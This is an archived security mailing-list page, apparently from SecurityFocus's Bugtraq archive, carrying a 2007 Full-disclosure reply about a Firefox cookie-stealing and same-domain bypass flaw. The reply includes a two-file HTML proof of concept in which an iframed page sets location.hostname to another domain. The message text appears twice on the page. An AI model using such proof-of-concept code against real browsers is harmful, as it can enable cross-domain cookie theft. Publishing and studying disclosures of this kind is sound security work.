Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Feb 15 2007 03:25PM
pdp (architect) (pdp gnucitizen googlemail com)
weird, firefox slowly dies out
t2.html
<html>
<body>
<iframe src="t1.html"></iframe>
</body>
</html>
t1.html
<html>
<body>
<script>location.hostname="blog.com";</script>
</body>
</html>
On 2/15/07, pdp (architect) <pdp.gnucitizen (at) googlemail (dot) com [email concealed]> wrote:
> the first one runs in about:blank...
[ more ]
Privacy Statement
Copyright 2009, SecurityFocus
t2.html
<html>
<body>
<iframe src="t1.html"></iframe>
</body>
</html>
t1.html
<html>
<body>
<script>location.hostname="blog.com";</script>
</body>
</html>
On 2/15/07, pdp (architect) <pdp.gnucitizen (at) googlemail (dot) com [email concealed]> wrote:
> the first one runs in about:blank...
[ more ]